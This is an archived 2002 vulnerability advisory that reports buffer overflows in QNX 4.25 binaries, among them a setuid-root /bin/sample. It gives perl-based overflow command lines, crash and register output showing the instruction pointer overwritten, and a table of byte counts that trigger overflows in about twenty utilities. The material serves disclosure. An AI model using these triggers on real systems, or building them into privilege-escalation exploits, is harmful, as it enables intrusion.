TUCoPS :: Unix :: Various Flavours :: misc5459.htm

QnX multiples bof in suid/no suid files
17th Jun 2002 [SBWID-5459]
COMMAND

	QnX multiples bof in suid/no suid files

SYSTEMS AFFECTED

	QnX OS 4.25

PROBLEM

	Egor Egorov founds the following binaries to  be  vulnerable  to  buffer
	overflows :
	

	/bin/sample
	

	 Example :

	 =========

	

	# cd /bin

	# ls -l sample

	-rwsrwxr-x  1 root      root          20639 Jan 19  1996 sample

	# sample `perl -e \'print \"A\" x 280\'`

	Profile based upon 2000 samples/second.

	

	//1/bin/sample terminated (SIGSEGV) at 0005:00000041

	%1  672  Memory fault      sample $(perl -e \'print \"A\" x 280\')

	

	# wd sample \'perl -e print \"A\" x 280\'`

	ebp: 41414141

	eip: 00000041

	

	# wd sample \'perl -e \'print \"A\" x 280, \"B\"\'`

	ebp: 41414141

	eip: 00004241

	

	

	

	/bin/ex
	

	 Example :

	 =========

	

	

	# wd ex `perl -e \'print \"AAA\" x 420, \"good\", \"CCC\" x 280\'`

	ebp: 00000041

	eip: 646f6f67 - doog

	

	

	

	And also :
	

	

	 file       bytes for bof

	

	/bin/du       - 558

	/bin/find     - 799

	/bin/lex      - 1673

	/bin/mkdir    - 517

	/bin/rm       - 351

	/bin/serserv  - 224

	/bin/tcpserv  - 146

	/bin/termdef  - 729

	/bin/time     - 2489

	/bin/unzip    - 299

	/bin/use      - 1964

	/bin/wcc      - 138

	/bin/wcc386   - 137

	/bin/wd       -

	/bin/wdisasm  - 135

	/bin/which    - 304

	/bin/wlib     - 256

	/bin/wlink    - 10244

	/bin/wpp      - 256

	/bin/wpp386   - 256

	/bin/wprof    - 141

	/bin/write    - 157

	/bin/wstrip   - 817

	

SOLUTION

	Update ?

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH